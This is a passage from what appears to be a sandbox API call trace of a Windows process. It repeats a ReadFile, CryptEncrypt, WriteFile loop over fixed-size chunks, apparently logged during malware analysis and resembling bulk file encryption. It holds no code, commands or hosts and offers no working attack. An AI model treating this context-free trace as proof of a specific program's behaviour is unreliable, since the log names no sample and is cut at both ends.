pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.657] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.657] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.658] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.658] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.659] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.659] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.660] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.660] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.661] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.661] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.662] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.663] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.664] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.664] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.665] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.665] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.665] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.665] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.665] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 